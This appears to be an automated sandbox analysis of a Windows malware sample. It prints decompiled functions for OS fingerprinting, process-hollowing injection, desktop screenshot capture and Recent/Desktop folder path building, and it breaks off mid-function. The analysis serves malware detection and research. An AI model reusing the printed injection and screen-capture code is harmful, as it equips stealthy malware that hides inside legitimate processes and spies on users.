                                    0x24020467
                                    0x2402046f
                                    0x2402046f
                                    0x2402044e
                                    0x24020456
                                    0x24020456
                                    0x24020435
                                    0x2402043d
                                    0x2402043d
                                    0x240203c5
                                    0x240203c7
                                    0x240203e3
                                    0x240203ff
                                    0x24020421
                                    0x24020407
                                    0x2402040f
                                    0x2402040f
                                    0x240203eb
                                    0x240203f3
                                    0x240203f3
                                    0x240203cf
                                    0x240203d7
                                    0x240203d7
                                    0x240203c7
                                    0x24020366
                                    0x24020368
                                    0x2402038d
                                    0x240203a9
                                    0x2402038f
                                    0x24020397
                                    0x24020397
                                    0x24020372
                                    0x2402037a
                                    0x2402037a
                                    0x24020368
                                    0x240202ee
                                    0x240202f0
                                    0x2402030c
                                    0x24020328
                                    0x2402034a
                                    0x24020330
                                    0x24020338
                                    0x24020338
                                    0x24020314
                                    0x2402031c
                                    0x2402031c
                                    0x240202f8
                                    0x24020300
                                    0x24020300
                                    0x240202f0
                                    0x00000000
                                    0x2401ffc4
                                    0x2401ffcc
                                    0x2401ffd8
                                    0x00000000
                                    0x00000000
                                    0x2401fffa
                                    0x24020003
                                    0x24020009
                                    0x240202ca
                                    0x240202d2
                                    0x00000000
                                    0x240202d2
                                    0x2402000f
                                    0x00000000
                                    0x2402004c
                                    0x24020052
                                    0x2402005e
                                    0x24020064
                                    0x2402007b
                                    0x24020089
                                    0x00000000
                                    0x00000000
                                    0x2402009a
                                    0x2402009d
                                    0x240200a3
                                    0x240200aa
                                    0x240200af
                                    0x240200b5
                                    0x240200bc
                                    0x240200c2
                                    0x240200cc
                                    0x240200d1
                                    0x240200d7
                                    0x240200da
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240200eb
                                    0x240200ee
                                    0x240200f4
                                    0x240200fb
                                    0x24020100
                                    0x24020106
                                    0x2402010d
                                    0x24020113
                                    0x2402011d
                                    0x24020122
                                    0x24020128
                                    0x2402012b
                                    0x00000000
                                    0x00000000
                                    0x2402013c
                                    0x2402013f
                                    0x24020145
                                    0x2402014c
                                    0x24020151
                                    0x24020157
                                    0x2402015e
                                    0x24020164
                                    0x2402016e
                                    0x24020173
                                    0x24020179
                                    0x2402017c
                                    0x00000000
                                    0x00000000
                                    0x2402018d
                                    0x24020190
                                    0x24020196
                                    0x2402019d
                                    0x240201a2
                                    0x240201a8
                                    0x240201af
                                    0x240201b5
                                    0x240201bf
                                    0x240201c4
                                    0x240201ca
                                    0x240201cd
                                    0x00000000
                                    0x00000000
                                    0x240201de
                                    0x240201e1
                                    0x240201e7
                                    0x240201ee
                                    0x240201f3
                                    0x240201f9
                                    0x24020200
                                    0x24020206
                                    0x24020210
                                    0x24020215
                                    0x2402021b
                                    0x2402021e
                                    0x00000000
                                    0x00000000
                                    0x2402022f
                                    0x24020232
                                    0x24020238
                                    0x2402023f
                                    0x24020244
                                    0x2402024a
                                    0x24020251
                                    0x24020257
                                    0x24020261
                                    0x24020266
                                    0x2402026c
                                    0x2402026f
                                    0x00000000
                                    0x00000000
                                    0x24020280
                                    0x24020283
                                    0x24020289
                                    0x24020290
                                    0x24020295
                                    0x2402029b
                                    0x240202a2
                                    0x240202a8
                                    0x240202b2
                                    0x240202b7
                                    0x240202bd
                                    0x240202c0
                                    0x00000000
                                    0x00000000
                                    0x2402000f
                                    0x2401ffb1
                                    0x2401fa47
                                    0x2401fa50
                                    0x2401fee5
                                    0x2401ff62
                                    0x2401ff68
                                    0x2401ff75
                                    0x2401ff7b
                                    0x2401ff92
                                    0x2401ffa0
                                    0x2401fee7
                                    0x2401feee
                                    0x2401ff0b
                                    0x2401ff35
                                    0x2401ff51
                                    0x2401ff37
                                    0x2401ff3f
                                    0x2401ff3f
                                    0x2401ff1c
                                    0x2401ff24
                                    0x2401ff24
                                    0x2401fef7
                                    0x2401feff
                                    0x2401feff
                                    0x2401feee
                                    0x00000000
                                    0x2401fee5
                                    0x2401fa56
                                    0x2401fa5f
                                    0x2401fa72
                                    0x2401fa7c
                                    0x2401fa7c
                                    0x2401fa61
                                    0x2401fa69
                                    0x2401fa69
                                    0x2401fa88
                                    0x00000000
                                    0x2401fa8e
                                    0x2401faaa
                                    0x2401fab0
                                    0x2401fab6
                                    0x2401fe91
                                    0x2401fe9b
                                    0x2401fea1
                                    0x2401fead
                                    0x2401feb3
                                    0x2401feca
                                    0x2401fed8
                                    0x00000000
                                    0x2401fed8
                                    0x2401fac2
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x2401fb20
                                    0x2401fb26
                                    0x2401fb32
                                    0x2401fb38
                                    0x2401fb4f
                                    0x2401fb5d
                                    0x00000000
                                    0x00000000
                                    0x2401fb6e
                                    0x2401fb71
                                    0x2401fb77
                                    0x2401fb7e
                                    0x2401fb83
                                    0x2401fb89
                                    0x2401fb90
                                    0x2401fb96
                                    0x2401fba0
                                    0x2401fba5
                                    0x2401fbab
                                    0x2401fbae
                                    0x00000000
                                    0x00000000
                                    0x2401fbbf
                                    0x2401fbc2
                                    0x2401fbc8
                                    0x2401fbcf
                                    0x2401fbd4
                                    0x2401fbda
                                    0x2401fbe1
                                    0x2401fbe7
                                    0x2401fbf1
                                    0x2401fbf6
                                    0x2401fbfc
                                    0x2401fbff
                                    0x00000000
                                    0x00000000
                                    0x2401fc10
                                    0x2401fc13
                                    0x2401fc19
                                    0x2401fc20
                                    0x2401fc25
                                    0x2401fc2b
                                    0x2401fc32
                                    0x2401fc38
                                    0x2401fc42
                                    0x2401fc47
                                    0x2401fc4d
                                    0x2401fc50
                                    0x00000000
                                    0x00000000
                                    0x2401fc61
                                    0x2401fc64
                                    0x2401fc6a
                                    0x2401fc71
                                    0x2401fc76
                                    0x2401fc7c
                                    0x2401fc83
                                    0x2401fc89
                                    0x2401fc93
                                    0x2401fc98
                                    0x2401fc9e
                                    0x2401fca1
                                    0x00000000
                                    0x00000000
                                    0x2401fcb2
                                    0x2401fcb5
                                    0x2401fcbb
                                    0x2401fcc2
                                    0x2401fcc7
                                    0x2401fccd
                                    0x2401fcd4
                                    0x2401fcda
                                    0x2401fce4
                                    0x2401fce9
                                    0x2401fcef
                                    0x2401fcf2
                                    0x00000000
                                    0x00000000
                                    0x2401fd03
                                    0x2401fd06
                                    0x2401fd0c
                                    0x2401fd13
                                    0x2401fd18
                                    0x2401fd1e
                                    0x2401fd25
                                    0x2401fd2b
                                    0x2401fd35
                                    0x2401fd3a
                                    0x2401fd40
                                    0x2401fd43
                                    0x00000000
                                    0x00000000
                                    0x2401fd54
                                    0x2401fd57
                                    0x2401fd5d
                                    0x2401fd64
                                    0x2401fd69
                                    0x2401fd6f
                                    0x2401fd76
                                    0x2401fd7c
                                    0x2401fd86
                                    0x2401fd8b
                                    0x2401fd91
                                    0x2401fd94
                                    0x00000000
                                    0x00000000
                                    0x2401fda5
                                    0x2401fda8
                                    0x2401fdae
                                    0x2401fdb5
                                    0x2401fdba
                                    0x2401fdc0
                                    0x2401fdc7
                                    0x2401fdcd
                                    0x2401fdd7
                                    0x2401fddc
                                    0x2401fde2
                                    0x2401fde5
                                    0x00000000
                                    0x00000000
                                    0x2401fdf6
                                    0x2401fdf9
                                    0x2401fdff
                                    0x2401fe06
                                    0x2401fe0b
                                    0x2401fe11
                                    0x2401fe18
                                    0x2401fe1e
                                    0x2401fe28
                                    0x2401fe2d
                                    0x2401fe33
                                    0x2401fe36
                                    0x00000000
                                    0x00000000
                                    0x2401fe47
                                    0x2401fe4a
                                    0x2401fe50
                                    0x2401fe57
                                    0x2401fe5c
                                    0x2401fe62
                                    0x2401fe69
                                    0x2401fe6f
                                    0x2401fe79
                                    0x2401fe7e
                                    0x2401fe84
                                    0x2401fe87
                                    0x00000000
                                    0x00000000
                                    0x2401fac2
                                    0x2401f977
                                    0x2402048c
                                    0x24020492
                                    0x240204a6
                                    0x240204b4
                                    0x00000000
                                    0x240204b4
                                    0x2401f971
                                    0x2401f96c
                                    0x2401f878
                                    0x2401f878
                                    0x2401f87a
                                    0x2401f87c
                                    0x2401f87d
                                    0x00000000
                                    0x2401f87f
                                    0x2401f881
                                    0x2401f882
                                    0x2401f886
                                    0x2401f887
                                    0x2401f88c
                                    0x2401f88f
                                    0x2401f892
                                    0x2401f89d
                                    0x2401f8a4
                                    0x2401f8a9
                                    0x2401f8ae
                                    0x2401f8b3
                                    0x2401f8b8
                                    0x2401f8bd
                                    0x2401f8c0
                                    0x2401f8c3
                                    0x2401f8c7
                                    0x2401f8c9
                                    0x2401f8e1
                                    0x2401f8e3
                                    0x2401f8e5
                                    0x2401f8fd
                                    0x2401f901
                                    0x2401f901
                                    0x2401f8fd
                                    0x00000000
                                    0x2401f8e1

                                    APIs
                                    • GetVersionExW.KERNEL32(0000011C), ref: 2401F8DA
                                    • GetVersionExW.KERNEL32(00000094,0000011C), ref: 2401F8F6
                                    • GetSystemInfo.KERNEL32(?,0000011C), ref: 2401F95C
                                      • Part of subcall function 24015C78: wvsprintfA.USER32(?,00000000,?), ref: 24015D0E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Version$InfoSystemwvsprintf
                                    • String ID: - Service Pack: %s$ Server (unknown edition)$%d.%d$%s %s$%s %s Server$%s (Build: %d$(unknown edition)$A$Business$Business N$Datacenter$Enterprise$Enterprise IA64$Enterprise N$Home Basic$Home Basic N$Premium$Premium N$Standard$Starter$Ultimate$Ultimate N$Unknown$Unknown Platform ID (%d)$Web$Windows 2000 Professional$Windows 2000 Server$Windows 2000 Server Datacenter$Windows 2000 Server Enterprise$Windows 2000 Server Web Edition$Windows 2003 Server$Windows 2003 Server (Release 2)$Windows 2003 Server Datacenter$Windows 2003 Server Enterprise$Windows 2003 Server Web Edition$Windows 2008$Windows 3.1$Windows 7$Windows 95$Windows 95 (Release 2)$Windows 98$Windows 98 SE$Windows Home Server$Windows ME$Windows NT %d.%d$Windows NT 4.0 Server$Windows NT 4.0 Server Datacenter$Windows NT 4.0 Server Enterprise$Windows NT 4.0 Server Web Edition$Windows Vista$Windows XP Home$Windows XP Professional$Windows XP Professional x64
                                    • API String ID: 3060546747-1031444156
                                    • Opcode ID: 76a644fe886fe04d2ac714b8c89d0fe76ddc629a9b06761855470f8c53fff949
                                    • Instruction ID: 71c93ff3c1d474e248a623fcec184ab3bb47703467734705ded63ca227e99c14
                                    • Opcode Fuzzy Hash: 76a644fe886fe04d2ac714b8c89d0fe76ddc629a9b06761855470f8c53fff949
                                    • Instruction Fuzzy Hash: B6726370A04B58CFEB61CB64C844BCAB7F4AB49308F4084E9D68DA7699D774DAC8CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240145F0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 53%
                                    			E240145F0(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E240145DC(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E240145DC(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L2401128C();
									while( *_t93 != 0) {
										_t90 = E240145DC(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L2401128C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L24011294();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L2401128C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L24011294();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L2401128C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L2401128C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                    0x240145fc
                                    0x240145ff
                                    0x24014605
                                    0x24014612
                                    0x24014616
                                    0x24014658
                                    0x2401465e
                                    0x2401469b
                                    0x00000000
                                    0x24014660
                                    0x24014667
                                    0x24014678
                                    0x2401467d
                                    0x24014683
                                    0x2401468b
                                    0x24014690
                                    0x2401469e
                                    0x240146a0
                                    0x240146a6
                                    0x240146aa
                                    0x240146b1
                                    0x240146b2
                                    0x2401475d
                                    0x240146c4
                                    0x240146c8
                                    0x240146d5
                                    0x240146dc
                                    0x240146dd
                                    0x240146e6
                                    0x240146e7
                                    0x240146ff
                                    0x24014704
                                    0x24014707
                                    0x2401470c
                                    0x24014712
                                    0x24014713
                                    0x24014723
                                    0x24014725
                                    0x24014735
                                    0x2401473c
                                    0x24014746
                                    0x24014747
                                    0x2401474c
                                    0x24014752
                                    0x24014753
                                    0x24014759
                                    0x2401475b
                                    0x00000000
                                    0x2401475b
                                    0x24014723
                                    0x24014704
                                    0x00000000
                                    0x240146d5
                                    0x24014769
                                    0x24014770
                                    0x24014774
                                    0x24014775
                                    0x24014775
                                    0x24014690
                                    0x2401467d
                                    0x24014667
                                    0x24014618
                                    0x24014623
                                    0x24014627
                                    0x00000000
                                    0x24014629
                                    0x24014629
                                    0x24014634
                                    0x24014638
                                    0x2401463d
                                    0x00000000
                                    0x2401463f
                                    0x24014642
                                    0x24014649
                                    0x2401464d
                                    0x2401464e
                                    0x2401464e
                                    0x2401463d
                                    0x24014627
                                    0x2401477a
                                    0x24014783

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 2401460D
                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 2401461E
                                    • lstrcpyn.KERNEL32(?,?,?), ref: 2401464E
                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 240146B2
                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 240146E7
                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 240146FA
                                    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 24014707
                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 24014713
                                    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 24014747
                                    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 24014753
                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 24014775
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                    • API String ID: 3245196872-1565342463
                                    • Opcode ID: ae15f84802420ba3dce09711200a096ca32d3c6b85d9d07c8a19301cc0faf9c5
                                    • Instruction ID: 360b943bc8dc9892bb07f38a47b037ce3c98c7562392fb1ee59750e0c93b4a38
                                    • Opcode Fuzzy Hash: ae15f84802420ba3dce09711200a096ca32d3c6b85d9d07c8a19301cc0faf9c5
                                    • Instruction Fuzzy Hash: 8C416C72A00259AFEB11DAF8CC88FDEB7EC9F59209F0040B5E94CEB154D7749E948B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24054984, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 213injectionthreadprocessCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E24054984(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, short _a4) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				void _v20;
				long _v24;
				long _v28;
				long _v32;
				intOrPtr _v36;
				char _v37;
				char _v44;
				struct _PROCESS_INFORMATION _v60;
				short _v80;
				struct _CONTEXT _v332;
				CHAR* _t107;
				int _t120;
				void* _t150;
				int _t162;
				signed int _t184;
				intOrPtr _t195;
				intOrPtr _t197;
				signed int _t200;
				void* _t202;
				void* _t204;
				void* _t205;
				intOrPtr _t206;

				_t204 = _t205;
				_t206 = _t205 + 0xfffffeb8;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E24013524(_v12);
				E24013524(_v16);
				_push(_t204);
				_push(0x24054bf2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t206;
				E24011CF0( &_v60, 0x10);
				E24011CF0( &(_v332.ExtendedRegisters), 0x44);
				_v332.ExtendedRegisters.cb = 0x44;
				_v80 = _a4;
				_t107 = E24013534(_v16);
				if(CreateProcessA(E24013534(_v12), _t107, 0, 0, 0, 4, 0, 0,  &(_v332.ExtendedRegisters),  &_v60) == 0) {
					_pop(_t195);
					 *[fs:eax] = _t195;
					_push(0x24054bf9);
					return E240130AC( &_v16, 2);
				} else {
					_v37 = 1;
					_push(_t204);
					_push(0x24054bd0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t206;
					_v332.ContextFlags = 0x10002;
					if(GetThreadContext(_v60.hThread,  &_v332) != 0 && ReadProcessMemory(_v60.hProcess, _v332.Ebx + 8,  &_v20, 4,  &_v24) != 0 && E2405493C(_v60.hProcess, _v20) >= 0 && _v8 != 0) {
						_v36 =  *((intOrPtr*)(_v8 + 0x3c)) + _v8;
						_v20 = VirtualAllocEx(_v60.hProcess,  *(_v36 + 0x34),  *(_v36 + 0x50), 0x3000, 4);
						if(_v20 != 0 && WriteProcessMemory(_v60.hProcess, _v20, _v8,  *(_v36 + 0x54),  &_v28) != 0) {
							_t202 = E24054924(_v36);
							_t150 = ( *(_v36 + 6) & 0x0000ffff) - 1;
							if(_t150 >= 0) {
								_v44 = _t150 + 1;
								_t184 = 0;
								do {
									_t200 = _t184 + _t184 * 4;
									if(WriteProcessMemory(_v60.hProcess,  *((intOrPtr*)(_t202 + 0xc + _t200 * 8)) + _v20,  *((intOrPtr*)(_t202 + 0x14 + _t200 * 8)) + _v8,  *(_t202 + 0x10 + _t200 * 8),  &_v28) != 0) {
										VirtualProtectEx(_v60.hProcess,  *((intOrPtr*)(_t202 + 0xc + _t200 * 8)) + _v20,  *(_t202 + 8 + _t200 * 8), E24054930( *((intOrPtr*)(_t202 + 0x24 + _t200 * 8))),  &_v32);
									}
									_t184 = _t184 + 1;
									_t74 =  &_v44;
									 *_t74 = _v44 - 1;
								} while ( *_t74 != 0);
							}
							if(WriteProcessMemory(_v60.hProcess, _v332.Ebx + 8,  &_v20, 4,  &_v28) != 0) {
								_v332.Eax =  *((intOrPtr*)(_v36 + 0x28)) + _v20;
								_t162 = SetThreadContext(_v60.hThread,  &_v332);
								asm("sbb eax, eax");
								_v37 = _t162 + 1;
							}
						}
					}
					_pop(_t197);
					 *[fs:eax] = _t197;
					_push(0x24054bd7);
					if(_v37 != 0) {
						_t120 = ResumeThread(_v60.hThread);
					} else {
						_t120 = TerminateProcess(_v60, 0);
					}
					return _t120;
				}
			}




























                                    0x24054985
                                    0x24054987
                                    0x24054990
                                    0x24054993
                                    0x24054996
                                    0x2405499c
                                    0x240549a4
                                    0x240549ab
                                    0x240549ac
                                    0x240549b1
                                    0x240549b4
                                    0x240549c3
                                    0x240549d2
                                    0x240549d7
                                    0x240549e3
                                    0x240549fe
                                    0x24054a14
                                    0x24054bd9
                                    0x24054bdc
                                    0x24054bdf
                                    0x24054bf1
                                    0x24054a1a
                                    0x24054a1a
                                    0x24054a20
                                    0x24054a21
                                    0x24054a26
                                    0x24054a29
                                    0x24054a2c
                                    0x24054a48
                                    0x24054a99
                                    0x24054aba
                                    0x24054ac1
                                    0x24054af3
                                    0x24054afc
                                    0x24054aff
                                    0x24054b02
                                    0x24054b05
                                    0x24054b07
                                    0x24054b0b
                                    0x24054b2e
                                    0x24054b4f
                                    0x24054b4f
                                    0x24054b54
                                    0x24054b55
                                    0x24054b55
                                    0x24054b55
                                    0x24054b07
                                    0x24054b79
                                    0x24054b84
                                    0x24054b95
                                    0x24054b9d
                                    0x24054ba0
                                    0x24054ba0
                                    0x24054b79
                                    0x24054ac1
                                    0x24054ba5
                                    0x24054ba8
                                    0x24054bab
                                    0x24054bb4
                                    0x24054bc7
                                    0x24054bb6
                                    0x24054bbc
                                    0x24054bbc
                                    0x24054bcf
                                    0x24054bcf

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 24054A0D
                                    • GetThreadContext.KERNEL32(?,00010002), ref: 24054A41
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,00010002), ref: 24054A66
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,?,00010002), ref: 24054AB5
                                    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,?), ref: 24054ADE
                                    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,?,?,?,00003000,00000004,?), ref: 24054B27
                                    • VirtualProtectEx.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 24054B4F
                                    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000004,?), ref: 24054B72
                                    • SetThreadContext.KERNEL32(?,00010002,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000), ref: 24054B95
                                    • TerminateProcess.KERNEL32(?,00000000,24054BD7), ref: 24054BBC
                                    • ResumeThread.KERNEL32(?,24054BD7), ref: 24054BC7
                                      • Part of subcall function 2405493C: LoadLibraryA.KERNEL32(ntdll.dll,ZwUnmapViewOfSection,?,00000000,24054A7E,?,?,?,00000004,?,?,00010002), ref: 2405494C
                                      • Part of subcall function 2405493C: GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 24054952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Memory$ThreadWrite$ContextVirtual$AddressAllocCreateLibraryLoadProcProtectReadResumeTerminate
                                    • String ID: D
                                    • API String ID: 4089571990-2746444292
                                    • Opcode ID: 2d0103c8c0fb3344d4af153e7ca549fb84544ecc34edc6d0bda3011a69407dd1
                                    • Instruction ID: 600e35fc45183da5deea688338b622767f82856e887568bf7e58f8c6832d402a
                                    • Opcode Fuzzy Hash: 2d0103c8c0fb3344d4af153e7ca549fb84544ecc34edc6d0bda3011a69407dd1
                                    • Instruction Fuzzy Hash: C381C4B1A00209AFEB51DBE9DC81FEEBBF8FF58304F104465E608E7255D674E9848B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24037464, Relevance: 18.1, APIs: 12, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24037464(struct HWND__* __eax) {
				struct tagRECT _v36;
				intOrPtr _v40;
				int _v56;
				struct HBITMAP__* _v76;
				void* _v80;
				void* _v116;
				struct HDC__* _t33;
				struct HDC__* _t34;
				struct HWND__* _t35;
				int _t36;
				intOrPtr* _t38;

				_t38 =  &(_v36.right);
				_t35 = __eax;
				if(__eax == 0) {
					_t35 = GetDesktopWindow();
				}
				_t33 = GetDC(_t35);
				_t34 = CreateCompatibleDC(_t33);
				if(_t35 == 0) {
					_t36 = GetDeviceCaps(_t33, 8);
					_v56 = GetDeviceCaps(_t33, 0xa);
				} else {
					GetClientRect(_t35,  &_v36);
					_t36 = _v36.right - _v36.left;
					_v40 = _v36.bottom - _v36.top;
				}
				_v76 = CreateCompatibleBitmap(_t33, _t36, _v56);
				_v80 = SelectObject(_t34, _v76);
				BitBlt(_t34, 0, 0, _t36, _v76, _t33, 0, 0, 0xcc0020);
				SelectObject(_t34, _v116);
				DeleteDC(_t34);
				ReleaseDC(_t35, _t33);
				return  *_t38;
			}














                                    0x24037468
                                    0x2403746b
                                    0x2403746f
                                    0x24037476
                                    0x24037476
                                    0x2403747e
                                    0x24037486
                                    0x2403748a
                                    0x240374b5
                                    0x240374bf
                                    0x2403748c
                                    0x24037492
                                    0x2403749b
                                    0x240374a7
                                    0x240374a7
                                    0x240374cf
                                    0x240374dc
                                    0x240374f5
                                    0x24037500
                                    0x24037506
                                    0x2403750d
                                    0x2403751c

                                    APIs
                                    • GetDesktopWindow.USER32 ref: 24037471
                                    • GetDC.USER32(00000000), ref: 24037479
                                    • CreateCompatibleDC.GDI32(00000000), ref: 24037481
                                    • GetClientRect.USER32(00000000,?), ref: 24037492
                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 240374B0
                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 240374BA
                                    • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 240374CA
                                    • SelectObject.GDI32(00000000,00000000), ref: 240374D7
                                    • BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 240374F5
                                    • SelectObject.GDI32(00000000,0000000A), ref: 24037500
                                    • DeleteDC.GDI32(00000000), ref: 24037506
                                    • ReleaseDC.USER32(00000000,00000000), ref: 2403750D
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CapsCompatibleCreateDeviceObjectSelect$BitmapClientDeleteDesktopRectReleaseWindow
                                    • String ID:
                                    • API String ID: 337914687-0
                                    • Opcode ID: f1b76e16a75b4e8c41da1ba234a25fc9606e6697ddba96ae8bac77b0f0e9eb6f
                                    • Instruction ID: a966f1e2faad44930d1eb754137f7a6a547f067b3689c86d0d68619c88bcd98d
                                    • Opcode Fuzzy Hash: f1b76e16a75b4e8c41da1ba234a25fc9606e6697ddba96ae8bac77b0f0e9eb6f
                                    • Instruction Fuzzy Hash: 801160722457057FE311AAA88CC0F3F7AECDF96654F404919F988AF245DB74AC8087B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240409E4, Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 188fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 66%
                                    			E240409E4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v608;
				void _v928;
				char _v932;
				char _v936;
				char _v940;
				char _v1196;
				char _v1452;
				char _v1456;
				char _v1460;
				char _v1464;
				char _v1468;
				void* _t88;
				signed int _t108;
				intOrPtr _t183;
				void* _t189;
				intOrPtr _t194;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t210;
				intOrPtr _t211;

				_t157 = __ebx;
				_t209 = _t210;
				_t211 = _t210 + 0xfffffa48;
				_push(__esi);
				_v1456 = 0;
				_v1464 = 0;
				_v1468 = 0;
				_v1460 = 0;
				_v940 = 0;
				_v936 = 0;
				_v932 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				_push(_t209);
				_push(0x24040d1e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t211;
				E24013088(_v12);
				E24013480(_v8, 0x24040d34);
				if(0 != 0) {
					E24013480(_v8, 0x24040d44);
					if(__eflags != 0) {
						E24013480(_v8, "%RECENT%");
						if(__eflags != 0) {
							E24013480(_v8, "%DESKTOP%");
							if(__eflags == 0) {
								E2401673C("Desktop", __ebx,  &_v936, __esi, __eflags);
								E24013388( &_v8, 0x24040d78, _v936);
							}
						} else {
							E2401673C("Recent", __ebx,  &_v932, __esi, __eflags);
